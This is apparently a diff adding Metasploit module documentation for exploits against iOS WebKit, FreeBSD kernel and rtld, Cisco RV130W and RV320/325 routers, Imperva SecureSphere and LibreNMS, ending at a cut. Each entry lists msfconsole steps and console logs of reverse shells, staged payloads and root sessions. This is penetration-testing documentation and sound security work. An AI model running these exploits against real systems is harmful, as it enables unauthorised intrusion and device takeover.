+[*] 192.168.1.34     webkit_createthis - Requesting /exploit from Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Version/10.0 Mobile/14D27 Safari/602.1
+[+] 192.168.1.34     webkit_createthis - Sent async_wake exploit
+[+] 192.168.1.34     webkit_createthis - Sent sha1 iOS 10 payload
+[*] Meterpreter session 1 opened (192.168.1.51:4444 -> 192.168.1.34:49211) at 2019-04-15 11:34:01 +0200
+
+msf5 exploit(apple_ios/browser/webkit_createthis) > sessions
+
+Active sessions
+===============
+
+  Id  Name  Type                           Information                                  Connection
+  --  ----  ----                           -----------                                  ----------
+  1         meterpreter aarch64/apple_ios  uid=0, gid=0, euid=0, egid=0 @ 192.168.1.34  192.168.1.51:4444 -> 192.168.1.34:49211 (192.168.1.34)
+
+msf5 exploit(apple_ios/browser/webkit_createthis) > sessions 1
+[*] Starting interaction with 1...
+
+meterpreter > pwd
+/System/Library/Frameworks/WebKit.framework/XPCServices/com.apple.WebKit.WebContent.xpc
+meterpreter > getuid
+Server username: uid=0, gid=0, euid=0, egid=0
+```
@@ -0,0 +1,106 @@
+## Description
+
+  This module exploits a vulnerability in the FreeBSD kernel,
+  when running on 64-bit Intel processors.
+
+  By design, 64-bit processors following the X86-64 specification will
+  trigger a general protection fault (GPF) when executing a SYSRET
+  instruction with a non-canonical address in the RCX register.
+
+  However, Intel processors check for a non-canonical address prior to
+  dropping privileges, causing a GPF in privileged mode. As a result,
+  the current userland RSP stack pointer is restored and executed,
+  resulting in privileged code execution.
+
+
+## Vulnerable Application
+
+  This module has been tested successfully on:
+
+  * FreeBSD 8.3-RELEASE (amd64)
+  * FreeBSD 9.0-RELEASE (amd64)
+
+
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. Get a session
+  3. `use exploit/freebsd/local/intel_sysret_priv_esc`
+  4. `set SESSION <SESSION>`
+  5. `check`
+  6. `run`
+  7. You should get a new *root* session
+
+
+## Options
+
+  **SESSION**
+
+  Which session to use, which can be viewed with `sessions`
+
+  **WritableDir**
+
+  A writable directory file system path. (default: `/tmp`)
+
+
+## Scenarios
+
+### FreeBSD 9.0-RELEASE
+
+  ```
+  msf5 > use exploit/freebsd/local/intel_sysret_priv_esc 
+  msf5 exploit(freebsd/local/intel_sysret_priv_esc) > set session 1
+  session => 1
+  msf5 exploit(freebsd/local/intel_sysret_priv_esc) > set lhost 123.123.123.188
+  lhost => 123.123.123.188
+  msf5 exploit(freebsd/local/intel_sysret_priv_esc) > run
+
+  [!] SESSION may not be compatible with this module.
+  [*] Started reverse TCP handler on 123.123.123.188:4444 
+  [+] FreeBSD version 9.0-RELEASE appears vulnerable
+  [+] System architecture amd64 is supported
+  [+] hw.model: Intel(R) Core(TM) i9-1337 CPU @ 9.99GHz is vulnerable
+  [*] Writing '/tmp/.mTaR4rAPd.c' (4781 bytes) ...
+  [*] Max line length is 131073
+  [*] Writing 4781 bytes in 1 chunks of 17475 bytes (octal-encoded), using printf
+  [*] Writing '/tmp/.LBGkIVh' (218 bytes) ...
+  [*] Max line length is 131073
+  [*] Writing 218 bytes in 1 chunks of 614 bytes (octal-encoded), using printf
+  [*] Launching exploit...
+  [*] CVE-2012-0217 Intel sysret exploit -- iZsh (izsh at fail0verflow.com)
+  [*] 
+  [*] [*] Retrieving host information...
+  [*]     [+] CPU: GenuineIntel
+  [*]     [+] sysname: FreeBSD
+  [*]     [+] release: 9.0-RELEASE
+  [*]     [+] version: FreeBSD 9.0-RELEASE #0: Tue Jan  3 07:46:30 UTC 2012     root@farrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC
+  [*]     [+] machine: amd64
+  [*] [*] Validating target OS and version...
+  [*]     [+] Vulnerable :-)
+  [*] [*] Resolving kernel addresses...
+  [*]     [+] Resolved Xofl to 0xffffffff80b02e70
+  [*]     [+] Resolved Xbnd to 0xffffffff80b02ea0
+  [*]     [+] Resolved Xill to 0xffffffff80b02ed0
+  [*]     [+] Resolved Xdna to 0xffffffff80b02f00
+  [*]     [+] Resolved Xpage to 0xffffffff80b03240
+  [*]     [+] Resolved Xfpu to 0xffffffff80b02fc0
+  [*]     [+] Resolved Xalign to 0xffffffff80b03080
+  [*]     [+] Resolved Xmchk to 0xffffffff80b02f60
+  [*]     [+] Resolved Xxmm to 0xffffffff80b02ff0
+  [*] [*] Setup...
+  [*]     [+] Trigger code...
+  [*]     [+] Trampoline code...
+  [*] [*] Fire in the hole!
+  [*] [*] Got root!
+  [+] Success! Executing payload...
+  [*] Command shell session 2 opened (123.123.123.188:4444 -> 123.123.123.136:61024) at 2018-12-09 10:40:16 -0500
+  [+] Deleted /tmp/.mTaR4rAPd.c
+  [+] Deleted /tmp/.mTaR4rAPd
+  [+] Deleted /tmp/.LBGkIVh
+
+  id
+  uid=0(root) gid=0(wheel) groups=0(wheel)
+  uname -a
+  FreeBSD freebsd-9-0 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan  3 07:46:30 UTC 2012     root@farrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC  amd64
+  ```
+
@@ -0,0 +1,149 @@
+## Description
+
+  This module exploits a vulnerability in the FreeBSD
+  run-time link-editor (rtld).
+
+  The rtld `unsetenv()` function fails to remove `LD_*`
+  environment variables if `__findenv()` fails.
+
+  This can be abused to load arbitrary shared objects using
+  `LD_PRELOAD`, resulting in privileged code execution.
+
+
+## Vulnerable Application
+
+  This module has been tested successfully on:
+
+  * FreeBSD 7.2-RELEASE (amd64)
+  * FreeBSD 8.0-RELEASE (amd64)
+
+
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. Get a session
+  3. `use exploit/freebsd/local/rtld_execl_priv_esc`
+  4. `set SESSION <SESSION>`
+  5. `check`
+  6. `run`
+  7. You should get a new *root* session
+
+
+## Options
+
+  **SESSION**
+
+  Which session to use, which can be viewed with `sessions`
+
+
+## Scenarios
+
+### FreeBSD 7.2-RELEASE (amd64)
+
+  ```
+  msf5 > use exploit/freebsd/local/rtld_execl_priv_esc 
+  msf5 exploit(freebsd/local/rtld_execl_priv_esc) > set session 1
+  session => 1
+  msf5 exploit(freebsd/local/rtld_execl_priv_esc) > set verbose true
+  verbose => true
+  msf5 exploit(freebsd/local/rtld_execl_priv_esc) > set lhost 172.16.191.165
+  lhost => 172.16.191.165
+  msf5 exploit(freebsd/local/rtld_execl_priv_esc) > run
+
+  [*] Started reverse TCP handler on 172.16.191.165:4444 
+  [+] FreeBSD version 7.2-RELEASE appears vulnerable
+  [+] gcc is installed
+  [+] /sbin/ping is setuid
+  [*] Writing '/tmp/.Qv98Z0.c' (149 bytes) ...
+  [*] Max line length is 131073
+  [*] Writing 149 bytes in 1 chunks of 543 bytes (octal-encoded), using printf
+  [*] Writing '/tmp/.Re1l7JG.c' (413 bytes) ...
+  [*] Max line length is 131073
+  [*] Writing 413 bytes in 1 chunks of 1470 bytes (octal-encoded), using printf
+  [*] Writing '/tmp/.X85bYhTRF' (172 bytes) ...
+  [*] Max line length is 131073
+  [*] Writing 172 bytes in 1 chunks of 524 bytes (octal-encoded), using printf
+  [*] Launching exploit...
+  [*] /libexec/ld-elf.so.1: environment corrupt; missing value for 
+  [*] /libexec/ld-elf.so.1: environment corrupt; missing value for 
+  [*] /libexec/ld-elf.so.1: environment corrupt; missing value for 
+  [*] /libexec/ld-elf.so.1: environment corrupt; missing value for 
+  [*] /libexec/ld-elf.so.1: environment corrupt; missing value for 
+  [*] usage: ping [-AaDdfnoQqRrv] [-c count] [-G sweepmaxsize] [-g sweepminsize]
+  [*]             [-h sweepincrsize] [-i wait] [-l preload] [-M mask | time] [-m ttl]
+  [*]             [-P policy] [-p pattern] [-S src_addr] [-s packetsize] [-t timeout]
+  [*]             [-W waittime] [-z tos] host
+  [*]        ping [-AaDdfLnoQqRrv] [-c count] [-I iface] [-i wait] [-l preload]
+  [*]             [-M mask | time] [-m ttl] [-P policy] [-p pattern] [-S src_addr]
+  [*]             [-s packetsize] [-T ttl] [-t timeout] [-W waittime]
+  [*]             [-z tos] mcast-group
+  [*] Command shell session 2 opened (172.16.191.165:4444 -> 172.16.191.241:61425) at 2019-05-03 04:34:07 -0400
+  [+] Deleted /tmp/.Qv98Z0.c
+  [+] Deleted /tmp/.Qv98Z0.o
+  [+] Deleted /tmp/.Fv3rwXn.0
+  [+] Deleted /tmp/.Re1l7JG.c
+  [+] Deleted /tmp/.Re1l7JG
+  [+] Deleted /tmp/.X85bYhTRF
+
+  id
+  uid=0(root) gid=0(wheel) groups=0(wheel),1001(user)
+  uname -a
+  FreeBSD freebsd-7-2-amd64.local 7.2-RELEASE FreeBSD 7.2-RELEASE #0: Fri May  1 07:18:07 UTC 2009     root@driscoll.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC  amd64
+
+  ```
+
+### FreeBSD 8.0-RELEASE (amd64)
+
+  ```
+  msf5 > use exploit/freebsd/local/rtld_execl_priv_esc 
+  msf5 exploit(freebsd/local/rtld_execl_priv_esc) > set session 1
+  session => 1
+  msf5 exploit(freebsd/local/rtld_execl_priv_esc) > set verbose true
+  verbose => true
+  msf5 exploit(freebsd/local/rtld_execl_priv_esc) > set lhost 172.16.191.165
+  lhost => 172.16.191.165
+  msf5 exploit(freebsd/local/rtld_execl_priv_esc) > run
+
+  [*] Started reverse TCP handler on 172.16.191.165:4444 
+  [+] FreeBSD version 8.0-RELEASE appears vulnerable
+  [+] gcc is installed
+  [+] /sbin/ping is setuid
+  [*] Writing '/tmp/.ppHMfMh.c' (147 bytes) ...
+  [*] Max line length is 131073
+  [*] Writing 147 bytes in 1 chunks of 536 bytes (octal-encoded), using printf
+  [*] Writing '/tmp/.aSlXLjlX.c' (415 bytes) ...
+  [*] Max line length is 131073
+  [*] Writing 415 bytes in 1 chunks of 1476 bytes (octal-encoded), using printf
+  [*] Writing '/tmp/.9BdfNzy' (172 bytes) ...
+  [*] Max line length is 131073
+  [*] Writing 172 bytes in 1 chunks of 524 bytes (octal-encoded), using printf
+  [*] Launching exploit...
+  [*] /libexec/ld-elf.so.1: environment corrupt; missing value for 
+  [*] /libexec/ld-elf.so.1: environment corrupt; missing value for 
+  [*] /libexec/ld-elf.so.1: environment corrupt; missing value for 
+  [*] /libexec/ld-elf.so.1: environment corrupt; missing value for 
+  [*] /libexec/ld-elf.so.1: environment corrupt; missing value for 
+  [*] /libexec/ld-elf.so.1: environment corrupt; missing value for 
+  [*] usage: ping [-AaDdfnoQqRrv] [-c count] [-G sweepmaxsize] [-g sweepminsize]
+  [*]             [-h sweepincrsize] [-i wait] [-l preload] [-M mask | time] [-m ttl]
+  [*]             [-P policy] [-p pattern] [-S src_addr] [-s packetsize] [-t timeout]
+  [*]             [-W waittime] [-z tos] host
+  [*]        ping [-AaDdfLnoQqRrv] [-c count] [-I iface] [-i wait] [-l preload]
+  [*]             [-M mask | time] [-m ttl] [-P policy] [-p pattern] [-S src_addr]
+  [*]             [-s packetsize] [-T ttl] [-t timeout] [-W waittime]
+  [*]             [-z tos] mcast-group
+  [*] Command shell session 2 opened (172.16.191.165:4444 -> 172.16.191.239:57343) at 2019-05-03 04:36:16 -0400
+  [+] Deleted /tmp/.ppHMfMh.c
+  [+] Deleted /tmp/.ppHMfMh.o
+  [+] Deleted /tmp/.VWnmV5K86.0
+  [+] Deleted /tmp/.aSlXLjlX.c
+  [+] Deleted /tmp/.aSlXLjlX
+  [+] Deleted /tmp/.9BdfNzy
+
+  id
+  uid=0(root) gid=0(wheel) groups=0(wheel)
+  uname -a
+  FreeBSD freebsd-8-0-amd64.local 8.0-RELEASE FreeBSD 8.0-RELEASE #0: Sat Nov 21 15:02:08 UTC 2009     root@mason.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC  amd64
+
+  ```
+
@@ -0,0 +1,27 @@
+# Cisco RV130W Routers Management Interface Remote Command Execution
+
+A vulnerability in the web-based management interface of the Cisco RV130W Wireless-N Multifunction VPN Router could allow an unauthenticated, remote attacker to execute arbitrary code on an affected device.
+
+The vulnerability is due to improper validation of user-supplied data in the web-based management interface. An attacker could exploit this vulnerability by sending malicious HTTP requests to a targeted device.
+
+A successful exploit could allow the attacker to execute arbitrary code on the underlying operating
+system of the affected device as a high-privilege user.
+
+## Vulnerable Device
+
+* RV130 Multifunction VPN Router versions prior to 1.0.3.45 are affected.
+* RV130W Wireless-N Multifunction VPN Router versions prior to 1.0.3.45 are affected.
+
+This exploit was specifically written against version 1.0.3.28. To test, you can find the
+firmware here: https://software.cisco.com/download/home/285026141/type/282465789/release/1.0.3.28
+
+## Verification Steps
+
+1. Start msfconsole
+2. ```use exploit/linux/http/cisco_rv130_rmi_rce```
+3. ```set rhost [IP]```
+4. ```set payload linux/armle/meterpreter_reverse_tcp```
+5. ```set lhost [IP]```
+6. ```exploit```
+7. You should get a session
+
@@ -0,0 +1,148 @@
+## Intro
+This module automatically exploits two vulnerabilities to create an effectively
+unauthenticated remote code execution on RV320 and RV325 routers.
+
+The module will perform the following steps:
+
+First the module will download the configuration. Then it will extract the MD5
+password hash for the web interface user. The MD5 password hash is directly
+accepted during login instead of the plain text password. With the MD5 hash the
+module will authenticate to the web interface of the router and get a valid
+authentication cookie. 
+
+The second step is using the authentication cookie to
+send an authenticated request to the web interface which exploits a command
+injection vulnerability. The injection is limited to ~50 characters. Therefore,
+the module uses a web server to stage a shell payload for the MIPS64
+architecture of the router. Depending on the payload the module will result in
+a shell or meterpreter session.
+
+## Vulnerable Application:
+
+Cisco Small Business Routers RV320 and RV325 with firmware versions between
+1.4.2.15 and 14.2.20.
+
+Link to vulnerable Firmware Version:
+https://software.cisco.com/download/home/284005929/type/282465789/release/1.4.2.20?i=!pp
+
+
+Links to Advisories:
+Part 1 of the exploit (configuration download):
+https://www.redteam-pentesting.de/en/advisories/rt-sa-2018-002/-cisco-rv320-unauthenticated-configuration-export
+
+Part 2 of the exploit (command injection in web interface):
+https://www.redteam-pentesting.de/en/advisories/rt-sa-2018-004/-cisco-rv320-command-injection
+
+Advisories by vendor:
+https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-info
+https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-inject
+
+## Options
+
+**RHOSTS**
+Configure the remote vulnerable system.
+
+**RPORT**
+Configure the TCP port of the HTTP/HTTPS management web interface.
+
+**USE_SSL**
+This flag controls whether the remote management web interface is accessible
+via HTTPS or not. Should be false for HTTP and true for HTTPS.
+
+**PAYLOAD**
+Configure the Metasploit payload that you want to stage. Must be for MIPS64
+arch.  Set payload Options accordingly.
+
+**SRVHOST**
+The module stages the payload via a web server. This is the binding interface
+IP. Default can be set to 0.0.0.0. 
+
+**HTTPDelay**
+This configures how long the module should wait for the incoming HTTP
+connection to the HTTP stager.
+
+## Verification Steps:
+
+1. Have exploitable RV320 or RV325 router (exampe IP: 192.168.1.1):
+2. Start `msfconsole`:
+3. Do:  ```use exploit/linux/http/cisco_rv32x_rce```
+4. Do: ```set RHOSTS 192.168.1.1```
+5. Do: ```set payload linux/mips64/meterpreter_reverse_tcp``` (Set the MIPS64 payload you want to use)
+6. Do: ```set LHOST 192.168.1.2``` (Setting your own IP here, example: 192.168.1.2)
+7. Do: ```set RPORT 8007``` (Set the remote Port on which the router web interface is accessible)
+8. Do: ```run```
+9. Gives you a privileged (uid=0) shell or in the example a meterpreter session.
+
+
+## Scenario
+
+Exploiting a vulnerable RV320 router with publicly accessible HTTPS web
+interface on TCP port 443: 
+```
+msf5 exploit(linux/http/cisco_rv32x_rce) > set RHOSTS 192.168.1.1
+msf5 exploit(linux/http/cisco_rv32x_rce) > set payload linux/mips64/meterpreter_reverse_tcp
+msf5 exploit(linux/http/cisco_rv32x_rce) > set LHOST 192.168.1.2
+msf5 exploit(linux/http/cisco_rv32x_rce) > set RPORT 443
+msf5 exploit(linux/http/cisco_rv32x_rce) > set USE_SSL true
+msf5 exploit(linux/http/cisco_rv32x_rce) > run
+```
+
+Demo example output for the module:
+```
+msf5 > use exploit/linux/http/cisco_rv32x_rce 
+msf5 exploit(linux/http/cisco_rv32x_rce) > show options
+
+Module options (exploit/linux/http/cisco_rv32x_rce):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   HTTPDELAY  15               yes       Time that the HTTP Server will wait for the payload request
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                      yes       The target address range or CIDR identifier
+   RPORT      8007             yes       The target port (TCP)
+   SRVHOST    0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
+   SRVPORT    8080             yes       The local port to listen on.
+   URIPATH    /                yes       The path for the stager. Keep set to default! (We are limited to 50 chars for the initial command.)
+   USE_SSL    false            no        Negotiate SSL/TLS for outgoing connections
+   VHOST                       no        HTTP server virtual host
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   LINUX MIPS64
+
+msf5 exploit(linux/http/cisco_rv32x_rce) > set RHOSTS 192.168.1.1
+RHOSTS => 192.168.1.1
+msf5 exploit(linux/http/cisco_rv32x_rce) > set payload linux/mips64/meterpreter_reverse_tcp
+payload => linux/mips64/meterpreter_reverse_tcp
+msf5 exploit(linux/http/cisco_rv32x_rce) > set LHOST 192.168.1.2
+LHOST => 192.168.1.2
+msf5 exploit(linux/http/cisco_rv32x_rce) > set RPORT 443
+RPORT => 443
+msf5 exploit(linux/http/cisco_rv32x_rce) > set USE_SSL true
+USE_SSL => true
+msf5 exploit(linux/http/cisco_rv32x_rce) > run
+
+[*] Started reverse TCP handler on 192.168.1.2:4444 
+[*] Using URL: http://0.0.0.0:8080/
+[*] Local IP: http://192.168.1.2:8080/
+[*] Server started.
+[*] Downloading configuration from 192.168.1.1:443
+[*] Using SSL connection to router.
+[*] Successfully downloaded config
+[*] Got MD5-Hash: dfead10390e560aea745ccba53e044ed
+[*] Loging in as user cisco using password hash.
+[*] Using default auth_key 1964300002
+[*] Successfully logged in as user cisco.
+[*] Got cookies: mlap=RGVmYXVsdDE6Ojo6Y2lzY28=;
+[*] Sending payload. Staging via http://192.168.1.2:8080/.
+[*] 192.168.1.1:443 - Payload request received: /
+[*] Waiting for stager connection timed out. Try increasing the delay.
+[*] Meterpreter session 1 opened (192.168.1.2:4444 -> 192.168.1.1:48580) at 2019-03-14 10:00:00 +0100
+[*] Server stopped.
+
+meterpreter > getuid
+Server username: uid=0, gid=99, euid=0, egid=99
+```
@@ -0,0 +1,205 @@
+## Description
+
+This module exploits a command injection vulnerability in Imperva SecureSphere 13.x. The vulnerability exists in the PWS service, where Python CGIs didn't properly sanitize user supplied command parameters and directly passes them to corresponding CLI utility, leading to command injection. Agent registration credential is required to exploit SecureSphere in gateway mode.
+
+## Vulnerable Application
+
+Imperva SecureSphere 13.0/13.1/13.2
+
+## Verification Steps
+
+1. `use exploit/linux/http/imperva_securesphere_exec`
+2. `set RHOST [TARGET IP]`
+3. `set PASS [Agent registration password]` if the target has been set to gateway mode
+4. Run `check`
+5. Verify that the result is `The target is vulnerable.`
+6. `set payload linux/x64/meterpreter/reverse_tcp`
+7. `set LHOST [IP]`
+8. Run `exploit`
+9. Verify that the reverse shell is obtained
+
+## Scenarios
+
+Imperva Secure 13.0 Pre-FTL mode:
+```
+msf5 > use exploit/linux/http/imperva_securesphere_exec
+msf5 exploit(linux/http/imperva_securesphere_exec) > set RHOST 192.168.146.201
+RHOST => 192.168.146.201
+msf5 exploit(linux/http/imperva_securesphere_exec) > check
+[+] 192.168.146.201:443 The target is vulnerable.
+msf5 exploit(linux/http/imperva_securesphere_exec) > set payload linux/x64/meterpreter/reverse_tcp
+payload => linux/x64/meterpreter/reverse_tcp
+msf5 exploit(linux/http/imperva_securesphere_exec) > set LHOST 192.168.146.215
+LHOST => 192.168.146.215
+msf5 exploit(linux/http/imperva_securesphere_exec) > show options
+
+Module options (exploit/linux/http/imperva_securesphere_exec):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   PASS                        no        Agent registration password
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     192.168.146.201  yes       The target address range or CIDR identifier
+   RPORT      443              yes       The target port (TCP)
+   SRVHOST    0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
+   SRVPORT    8080             yes       The local port to listen on.
+   SSL        true             no        Use SSL
+   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI  /pws/impcli      no        The URI path to impcli
+   TIMEOUT    3                no        HTTP connection timeout
+   URIPATH                     no        The URI to use for this exploit (default is random)
+   USER       imperva          no        Agent registration username
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (linux/x64/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  192.168.146.215  yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Imperva SecureSphere 13.0/13.1/13.2
+
+
+msf5 exploit(linux/http/imperva_securesphere_exec) > exploit
+
+[*] Started reverse TCP handler on 192.168.146.215:4444
+[*] Sending payload linux/x64/meterpreter/reverse_tcp
+[*] Sending stage (816260 bytes) to 192.168.146.201
+[*] Command Stager progress - 100.00% done (1321/1321 bytes)
+
+meterpreter > sysinfo
+Computer     : localhost.localdomain
+OS           : Red Hat 6.3 (Linux 2.6.32-279.el6.imp8.numa.x86_64)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > shell
+Process 4965 created.
+Channel 1 created.
+id
+uid=497(lighttpd) gid=497(lighttpd) groups=497(lighttpd)
+/sbin/ifconfig
+eth0      Link encap:Ethernet  HWaddr 00:0C:29:DE:50:99
+          inet addr:192.168.146.201  Bcast:192.168.146.255  Mask:255.255.255.0
+          inet6 addr: fe80::20c:29ff:fede:5099/64 Scope:Link
+          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
+          RX packets:1331 errors:0 dropped:0 overruns:0 frame:0
+          TX packets:825 errors:0 dropped:0 overruns:0 carrier:0
+          collisions:0 txqueuelen:1000
+          RX bytes:1790319 (1.7 MiB)  TX bytes:83116 (81.1 KiB)
+
+lo        Link encap:Local Loopback
+          inet addr:127.0.0.1  Mask:255.0.0.0
+          inet6 addr: ::1/128 Scope:Host
+          UP LOOPBACK RUNNING  MTU:16436  Metric:1
+          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
+          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
+          collisions:0 txqueuelen:0
+          RX bytes:0 (0.0 b)  TX bytes:0 (0.0 b)
+
+exit
+meterpreter > exit
+[*] Shutting down Meterpreter...
+
+[*] 192.168.146.201 - Meterpreter session 1 closed.  Reason: User exit
+```
+
+Imperva SecureSphere 13.0 Gateway mode (Requires agent registration credential):
+```
+msf5 > use exploit/linux/http/imperva_securesphere_exec
+msf5 exploit(linux/http/imperva_securesphere_exec) > set RHOST 192.168.146.201
+RHOST => 192.168.146.201
+msf5 exploit(linux/http/imperva_securesphere_exec) > set PASS lshy5782%lsLS
+PASS => lshy5782%lsLS
+msf5 exploit(linux/http/imperva_securesphere_exec) > check
+[+] 192.168.146.201:443 The target is vulnerable.
+msf5 exploit(linux/http/imperva_securesphere_exec) > set payload linux/x64/meterpreter/reverse_tcp
+payload => linux/x64/meterpreter/reverse_tcp
+msf5 exploit(linux/http/imperva_securesphere_exec) > set LHOST 192.168.146.215
+LHOST => 192.168.146.215
+msf5 exploit(linux/http/imperva_securesphere_exec) > show options
+
+Module options (exploit/linux/http/imperva_securesphere_exec):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   PASS       lshy5782%lsLS    no        Agent registration password
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     192.168.146.201  yes       The target address range or CIDR identifier
+   RPORT      443              yes       The target port (TCP)
+   SRVHOST    0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
+   SRVPORT    8080             yes       The local port to listen on.
+   SSL        true             no        Use SSL
+   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI  /pws/impcli      no        The URI path to impcli
+   TIMEOUT    3                no        HTTP connection timeout
+   URIPATH                     no        The URI to use for this exploit (default is random)
+   USER       imperva          no        Agent registration username
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (linux/x64/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  192.168.146.215  yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Imperva SecureSphere 13.0/13.1/13.2
+
+
+msf5 exploit(linux/http/imperva_securesphere_exec) > exploit
+
+[*] Started reverse TCP handler on 192.168.146.215:4444
+[*] Sending payload linux/x64/meterpreter/reverse_tcp
+[*] Sending stage (816260 bytes) to 192.168.146.201
+[*] Command Stager progress - 100.00% done (1321/1321 bytes)
+
+meterpreter > sysinfo
+Computer     : 192.168.146.201
+OS           : Red Hat 6.3 (Linux 2.6.32-279.el6.imp8.numa.x86_64)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > shell
+Process 19634 created.
+Channel 1 created.
+id
+uid=497(lighttpd) gid=497(lighttpd) groups=497(lighttpd)
+/sbin/ifconfig
+eth0      Link encap:Ethernet  HWaddr 00:0C:29:DE:50:99
+          inet addr:192.168.146.201  Bcast:192.168.146.255  Mask:255.255.255.0
+          inet6 addr: fe80::20c:29ff:fede:5099/64 Scope:Link
+          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
+          RX packets:651 errors:0 dropped:0 overruns:0 frame:0
+          TX packets:451 errors:0 dropped:0 overruns:0 carrier:0
+          collisions:0 txqueuelen:1000
+          RX bytes:894174 (873.2 KiB)  TX bytes:37181 (36.3 KiB)
+
+lo        Link encap:Local Loopback
+          inet addr:127.0.0.1  Mask:255.0.0.0
+          inet6 addr: ::1/128 Scope:Host
+          UP LOOPBACK RUNNING  MTU:16436  Metric:1
+          RX packets:153 errors:0 dropped:0 overruns:0 frame:0
+          TX packets:153 errors:0 dropped:0 overruns:0 carrier:0
+          collisions:0 txqueuelen:0
+          RX bytes:21579 (21.0 KiB)  TX bytes:21579 (21.0 KiB)
+
+exit
+meterpreter > exit
+[*] Shutting down Meterpreter...
+
+[*] 192.168.146.201 - Meterpreter session 1 closed.  Reason: User exit
+```
@@ -0,0 +1,65 @@
+## Description
+  
+  In LibreNMS `v1.46` and below, there exists a command injection vulnerability in `capture.inc.php`.
+  The vulnerable functionality is intended to run a command such as `snmpwalk` and save the output as
+  a file. The `community` parameter is an unsanitized parameter retrieved through a POST request to `addhost`,
+  and it is used to build the command that is executed in the `capture.inc.php` functionality. The final command
+  is passed to the `popen()` function, which results in execution of arbitrary code.
+
+  This module has been tested on LibreNMS `v1.46` and `v1.45`.
+
+## Vulnerable Application
+
+  A [pre-built OVA](https://github.com/librenms/packer-builds/releases/tag/1.46) can be downloaded via a LibreNMS repo.
+
+  Additionally, vulnerable versions of LibreNMS for Ubuntu can be manually installed using the instructions [here](https://docs.librenms.org/Installation/Installation-Ubuntu-1804-Apache/).
+  In the command `composer create-project --no-dev --keep-vcs librenms/librenms librenms dev-master`, replace `dev-master` with a vulnerable version of the software, ex: `1.46`.
+
+## Verification Steps
+
+  1. Install the application
+  2. Start msfconsole
+  3. Do: ```use exploit/linux/http/librenms_addhost_cmd_inject```
+  4. Do: ```set RHOSTS <ip>```
+  5. Do: ```set USERNAME <user>```
+  6. Do: ```set PASSWORD <pass>```
+  7. Do: ```run```
+  8. You should get a shell.
+
+## Scenarios
+
+### Tested on LibreNMS 1.46 on Ubuntu 18.04
+
+  ```
+  msf5 > use exploit/linux/http/librenms_addhost_cmd_inject
+  msf5 exploit(linux/http/librenms_addhost_cmd_inject) > set rhosts 192.168.37.143
+  rhosts => 192.168.37.143
+  msf5 exploit(linux/http/librenms_addhost_cmd_inject) > set username blah
+  username => blah
+  msf5 exploit(linux/http/librenms_addhost_cmd_inject) > set password password
+  password => password
+  msf5 exploit(linux/http/librenms_addhost_cmd_inject) > set lhost 192.168.37.1
+  lhost => 192.168.37.1
+  msf5 exploit(linux/http/librenms_addhost_cmd_inject) > run
+
+  [*] Started reverse TCP double handler on 192.168.37.1:4444 
+  [*] Successfully logged into LibreNMS
+  [+] Successfully added device with hostname dFEzcH
+  [*] Accepted the first client connection...
+  [*] Accepted the second client connection...
+  [+] Successfully deleted device with hostname dFEzcH and id #126
+  [*] Command: echo 38eJIFZsiRl3Er48;
+  [*] Writing to socket A
+  [*] Writing to socket B
+  [*] Reading from sockets...
+  [*] Reading from socket A
+  [*] A: "Trying: not found\r\nsh: 2: Connected: not found\r\nsh: 3: Escape: not found\r\n38eJIFZsiRl3Er48\r\n"
+  [*] Matching...
+  [*] B is input...
+  [*] Command shell session 1 opened (192.168.37.1:4444 -> 192.168.37.143:55380) at 2019-05-29 15:26:02 -0500
+
+  whoami
+  www-data
+  uname -a
+  Linux ubuntu 4.18.0-15-generic #16~18.04.1-Ubuntu SMP Thu Feb 7 14:06:04 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
+  ```
@@ -0,0 +1,48 @@
+## Description
+
